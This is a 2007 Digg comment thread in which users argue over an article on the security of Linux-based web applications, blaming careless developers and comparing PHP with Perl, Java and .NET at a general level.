What is Digg?Sponsored by Activision
Band Hero view!
guitarhero.com - The biggest event music event of the year is now in your living room.
35 Comments
- kgool, on 10/12/2007, -0/+18Was it just me, or was there not a lot of meat in that story?
- rchtr, on 10/12/2007, -1/+12Any web app is only as secure as the programmer makes it. There's nothing particularly, inherently insecure about Linux...
- delsdog, on 10/12/2007, -0/+6I agree, it's not the fault of Linux that people make unsecure apps.
- lolwtfhaha, on 10/12/2007, -1/+5nevermind the potatoes
- nabiy, on 10/12/2007, -0/+3This has been a hot topic lately. Here is an interview with Dr. Crispin Cowan on the subject: http://neworder.box.sk/news/15197 in the interview he talks a bit about some viable options for dealing with this security risk. - nabiy
- babozor, on 10/12/2007, -1/+4It's not really specific to Linux OpenSource Technology (PHP, Perl, etc...)... if your webApp is on server just 'out of the box' you could expect some leaks, that's why we need so much some good network admin and system admin... but doesn't really depend on the code itself (except from few examples i saw which were surely type with feets)
- unsliced, on 10/12/2007, -0/+3Right - but if it starts people thinking, it's a good thing. Many people are running their own boxen as servers to the world yet probably don't even give security a second thought.
Can't hurt to flag up that most of us don't actually know as much as we think we do. - inactive, on 10/12/2007, -0/+3Shut the hell up with the comments saying oh this language sucks, its insecure, its not Linux that's in secure, blah blah.
Stop over analyzing the article and be pro-active and think about how you yourself can secure your web app instead of contemplating on how the article could have been worded better.
In my personal opinion, code whatever language you feel comfortable in. That being said, by comfortable I mean being able to code the long way and eliminate security holes before they can even begin. - mike503, on 10/12/2007, -1/+3web 2.0 stuff is heavy on things like ajax, and with the levels of stupidity in the world, everyone thinks they can just drop in some code. just like a ton of people who "code php" leave basic things unchecked and easily exploitable. XSS and inline variable replacement are probably the biggest issues in "web 2.0" - also html encoding anything that makes sense (some people I know have never faced that issue...)
last but not least, people need to remember to TRY to hack or break their own sites/code. don't wait for someone else to. i'm replying to your comment but it's really just a general purpose comment too.
where's the meat? google this stuff. sites like networkworld.com will never really have anything good on it. it's meant for ***** managers in IT to talk about over coffee... - gtdfaniam, on 10/12/2007, -0/+2a web application security article with no code snippets or explicit tips on what to look out for is about as useful as a banana in a gunfight.
- TheStooge1, on 10/12/2007, -1/+3The entire article basically said to watch what you were doing and where you were putting things. That's like saying you should be careful by putting doors on your house because if you don't lock them, someone could get in.
- haxx4, on 10/12/2007, -0/+2I was thinking the same thing. It basically said "secure your web applications" without giving any ideas on how you should do that. No digg.
- Lazybones, on 10/12/2007, -1/+3All true, but Linux evangelists are always saying how much more secure it is by design. That might be taken by some as "I don't need to worry, I run Linux". Bad thinking, but I have seen it.
- autodata, on 10/12/2007, -0/+2Perl or perl, not PERL. Otherwise you might start asking me for my MAC's Mac address, thus raining havoc and chaos on our nerd sensibilities.
- v3xt0r, on 10/12/2007, -1/+3definately more secure than your .NET or J2EE Web Applications.
- ronabop, on 10/12/2007, -0/+2Hm. Teaser Article.
- v3xt0r, on 10/12/2007, -0/+1It is actually PERL, since it is an Acronym for 'Practical Extraction and Reporting Language'.
I love when I see job ads for a Pearl Developer. - Lazybones, on 10/12/2007, -0/+1Yet have you seen what people put up on MySpace and Facebook? It is like people expect no one but there friends to look at this stuff, yet it is on a search able public system.
Same can be said about novice web programmers.. "If I didn't submit this to any search engines no one will see it" Well the search engines find it anyway. - brianlmoon, on 10/12/2007, -0/+1This has nothing to do with Linux. And frankly, PHP is the hot button for insecure web apps for the same reason that all viruses are written for Windows. They are both the most popular tool in their space for the average person.
- puggy, on 10/12/2007, -1/+2"People just have to pay attention to what they're putting up there and realize that it's for the world to see, and for the world to toy with"
Not very insightful there. - WorldBuilder, on 10/12/2007, -1/+2"How secure are your Linux-based Web apps?"
Pretty darn secure, thanks for asking. - irishfreakout, on 10/12/2007, -0/+1I keep seeing all these "Security Holes with new web apps" or "Web 2.0's great security flaws"... and yet we haven't see any actual evidence that holes actually exist.
- Zoplax, on 10/12/2007, -0/+1Try doing a search for "index of /" through any search engine, you may see a lot of hits for Apache sites that are improperly secured to allow users to browse site directories.
- inactive, on 10/12/2007, -0/+1People should have the smarts to go to google and type "secure php application" in the big search box.
Of course, those people are the dumb pricks who do literally "slap together" applications with half-formed knowledge they gleaned from people who'd only half-learnt php off other half-learned idiots, so maybe the article should have linked to a Google search for them. - Zoplax, on 10/12/2007, -0/+1Oops, was editing and digg ate the rest of my sentence.. Anyway such can reveal .PHP and other source files the site owner probably wouldn't want open to the public intarnets.
- troydoogle7, on 10/12/2007, -0/+1The reason php is so insecure, is not down to the language itself but the laziness of developers. Each post and get should be checked and verified before it is processed. webforms 2.0 will fix a lot of that.
Perhaps php should focus more on fixing it, however there are issues such as ease of launching a terminal program in apache from a website that should just never happen. Easy commands such as delete all should never have the chance of being run, from the web server. Its a trade off between convenience and security. At the moment, convenience is winning. I hope this changes! - ChaseVenters, on 10/12/2007, -0/+1For the record, PHP has a huge problem here and Perl simply doesn't. "use strict", "use taint" and query placeholders in Perl's DBI will eliminate entire classes of attacks. Under "taint" and using query placeholders, you would have to go out of your way to write a vulnerable web app capable of hurting anything beyond itself.
Contrast this to PHP, the language that gave you register_globals, INI-global addslashes() processing, the most polluted namespace ever and a trillion users of string concatenation for SQL query generation.
I know which one I use :P - radiofrequency, on 10/12/2007, -0/+1This worthless story should be filed on Microsoft's site under the press release section. A pure FUD piece.
What about .asp .net based web apps? Aren't those potentially as insecure as php and perl scripts, if not more? - dicroce, on 10/12/2007, -0/+1Well, I am a C/C++ programmer. Have been for 11 years. Worked on a lot of embedded projects, a lot of linux (even some kernel stuff)... And I use PHP on my server. Does that make me a "cursory" programmer?
Is digg.com a "cursory" site? Cause it's built on PHP...
I've looked at using Java on my server... Mostly because I like the language... But it's just the wrong tool for the job. Go ahead and stick with it tho... The more of my competition that insists on driving nails with a screw driver the better... - krinthekuz, on 09/16/2008, -1/+1stupid articles. i love the trend as of late... 3-10 sentences of little informative content often in size 11 or 12 font in 150px wide column, accompanied by a 100px wide nav column for "important topics", another 100px wide nav column directly to other popular "articles", and then the rest of the screen (including top banner) is smattered with ads. the bottom 80% of the page is then littered with affiliate links and personal links for pagerank, and who can forget he "sponsored links" box. sadly, i think this is still better than news on the tv and newspaper.
- wwnexc, on 10/12/2007, -0/+0Well, duh: If you don't set up a server correctly, it will be an easy target for sophisticated hackers of maybe even script kiddies. If you write crappy code, it has the same effect on the site's stability.
"Problem between keyboard and chair" - tuxuser, on 10/12/2007, -5/+5is this some linux hater? cause i've had enuff off this if i see linux or mac hate prepare to get modded. laters haters
- wasname, on 10/12/2007, -0/+0Any application you build has a certain amount of risk - and every platform has vulnerabilities. So.... what the point of this article again?? Oh, who from M$ wrote it? Hmmm…
- gspeed, on 10/12/2007, -2/+0how about ... use a real programming language like java and stop cutting corners. and yes ... this has nothing to do with Linux and everything to do with the scripting languages lame cursory programmers use like PHP.
- kgool, on 10/12/2007, -3/+1Kind of reminds me of a lady who complained to a sysadmin I work with that their linux box was perfectly secure then they installed.........., and it got hacked. Something had to be wrong with the server.
© Digg Inc. 2009
— Content created and posted by Digg users is